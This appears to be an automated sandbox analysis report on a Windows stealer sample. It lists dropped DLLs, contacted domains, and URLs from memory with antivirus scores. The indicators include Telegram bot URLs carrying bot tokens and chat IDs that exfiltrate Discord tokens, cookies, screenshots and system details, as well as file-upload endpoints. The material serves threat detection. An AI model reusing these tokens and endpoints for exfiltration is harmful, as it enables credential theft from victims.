C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
raw.githubusercontent.com	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
www.google.com	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	Sophos S4	malware repository domain
https://python.org/dev/peps/pep-0263/	0%	Avira URL Cloud	safe
https://github.com/Blank-c/BlankOBF	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/29207	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
http://www.micom/pkiops/Docs/ry.htm0	0%	Avira URL Cloud	safe
https://tools.ietf.org/html/rfc2388#section-4.4	0%	Avira URL Cloud	safe
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	1%	Virustotal		Browse
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	0%	Avira URL Cloud	safe
https://github.com/Blank-c/BlankOBF	2%	Virustotal		Browse
https://github.com/urllib3/urllib3/issues/29207	0%	Virustotal		Browse
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Virustotal		Browse
https://python.org/dev/peps/pep-0263/	0%	Virustotal		Browse
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt	0%	Avira URL Cloud	safe
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz	0%	Avira URL Cloud	safe
https://nuget.org/nuget.exe	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt	0%	Virustotal		Browse
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	0%	Virustotal		Browse
https://tools.ietf.org/html/rfc2388#section-4.4	0%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
http://cacerts.digicert.coz	0%	Avira URL Cloud	safe
https://nuget.org/nuget.exe	0%	Virustotal		Browse
http://ip-api.com	0%	Avira URL Cloud	safe
https://api.anonfiles.com/upload	1%	Virustotal		Browse
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Virustotal		Browse
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz	0%	Virustotal		Browse
http://cacerts.digi	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0205/	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Virustotal		Browse
http://ip-api.com	0%	Virustotal		Browse
https://semver.org/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-	0%	Avira URL Cloud	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0205/	0%	Virustotal		Browse
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	11%	Virustotal		Browse
https://github.com/python/cpython/issues/86361.	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Virustotal		Browse
http://schemas.xmlsoap.org/soap/encoding/	0%	Virustotal		Browse
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Virustotal		Browse
https://contoso.com/Icon	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Virustotal		Browse
https://httpbin.org/	0%	Avira URL Cloud	safe
https://semver.org/	0%	Virustotal		Browse
https://www.apache.org/licenses/	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	Avira URL Cloud	safe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://www.apache.org/licenses/	0%	Virustotal		Browse
https://contoso.com/Icon	0%	Virustotal		Browse
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	0%	Avira URL Cloud	safe
https://github.com/python/cpython/issues/86361.	0%	Virustotal		Browse
https://httpbin.org/	1%	Virustotal		Browse
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://www.python.org/psf/license/	0%	Avira URL Cloud	safe
http://ip-api.com/line/?fields=hostingr	0%	Avira URL Cloud	safe
http://cacerts.digicert.coCi	0%	Avira URL Cloud	safe
https://api.anonfiles.com/uploadr	0%	Avira URL Cloud	safe
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	0%	Virustotal		Browse
http://tools.ietf.org/html/rfc6125#section-6.4.3	0%	Avira URL Cloud	safe
https://www.python.org/psf/license/	0%	Virustotal		Browse
http://tools.ietf.org/html/rfc6125#section-6.4.3	0%	Virustotal		Browse
http://schemas.xmlsoap.org/wsdl/	0%	Avira URL Cloud	safe
http://cacerts.digicert	0%	Avira URL Cloud	safe
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Virustotal		Browse
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A	0%	Avira URL Cloud	safe
https://google.com/mail	0%	Avira URL Cloud	safe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	Virustotal		Browse
https://api.telegram.org/file/bot	0%	Avira URL Cloud	safe
http://ip-api.com/line/?fields=hostingr	0%	Virustotal		Browse
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	0%	Avira URL Cloud	safe
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	0%	Avira URL Cloud	safe
https://foss.heptapod.net/pypy/pypy/-/issues/3539	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	0%	Avira URL Cloud	safe
http://google.com/	0%	Avira URL Cloud	safe
https://api.gofile.io/getServerr	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	Avira URL Cloud	safe
https://www.python.org/download/releases/2.3/mro/.	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	Avira URL Cloud	safe
https://discordapp.com/api/v9/users/	0%	Avira URL Cloud	safe
http://ip-api.com/json/?fields=225545r	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2920	0%	Avira URL Cloud	safe
https://yahoo.com/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8	0%	Avira URL Cloud	safe
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
raw.githubusercontent.com	185.199.109.133	true	true	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	false	0%, Virustotal, Browse	unknown
www.google.com	216.58.212.132	true	false	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%205169%0A%E2%84%B9%EF%B8%8FSend%20%22/5169*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(3.27%20kb)	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5358754228:AAE42HAGW1bzIPxU7iVRC_96iDuHcwSjjVo/sendDocument	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%B8Screenshot%20taken	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20992547%0AUser%20name:%20user%0ASystem%20time:%202024-06-04%209:56:51%20pm%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20ON2Z3HY%0ARAM:%204095%20MB%0AHWID:%20E63B102745%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/?fields=225545	false	Avira URL Cloud: safe	unknown
http://www.google.com/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/Blank-c/BlankOBF	based.exe, 00000008.00000003.1893065874.000001EB8717D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1892158606.000001EB8717A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1892458033.000001EB87F83000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000013.00000002.2061867886.0000022E6DDC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/29207	based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://python.org/dev/peps/pep-0263/	hacn.exe, 00000009.00000002.1905399144.00007FFDFB9AF000.00000002.00000001.01000000.00000012.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://tools.ietf.org/html/rfc2388#section-4.4	based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.anonfiles.com/upload	based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz	based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cacerts.digicert.coz	based.exe, 00000007.00000002.2150147759.00000235B9F7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com	main.exe, 00000015.00000002.1999999146.0000025EB7D34000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	based.exe, 00000008.00000002.2126543094.000001EB87F80000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cacerts.digi	based.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0205/	based.exe, 00000008.00000003.1889915648.000001EB86F1A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1889699362.000001EB86EE0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123009852.000001EB86F80000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://semver.org/	svchost.exe, 00000020.00000002.2494944873.0000023340566000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000013.00000002.1988409193.0000022E557B1000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB7D34000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-	main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	based.exe, 00000008.00000002.2127328411.000001EB88234000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	TS-240605-Millenium1.exe, 00000002.00000002.1855851675.000002874E048000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122521044.000001EB86AC8000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899911021.000001BF9992C000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	true	11%, Virustotal, Browse Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python/cpython/issues/86361.	based.exe, 00000008.00000002.2123124196.000001EB871E2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1902852468.000001EB87852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1902852468.000001EB87804000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1905635031.000001EB87863000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://httpbin.org/	based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.apache.org/licenses/	svchost.exe, 00000016.00000003.1950071830.000002C3F582E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.python.org/psf/license/	TS-240605-Millenium1.exe, TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB200000.00000040.00000001.01000000.00000005.sdmp, based.exe, based.exe, 00000008.00000002.2132559008.00007FFDFB200000.00000040.00000001.01000000.0000000E.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hostingr	based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cacerts.digicert.coCi	based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.anonfiles.com/uploadr	based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	based.exe, 00000008.00000002.2127328411.000001EB88234000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digicert	TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
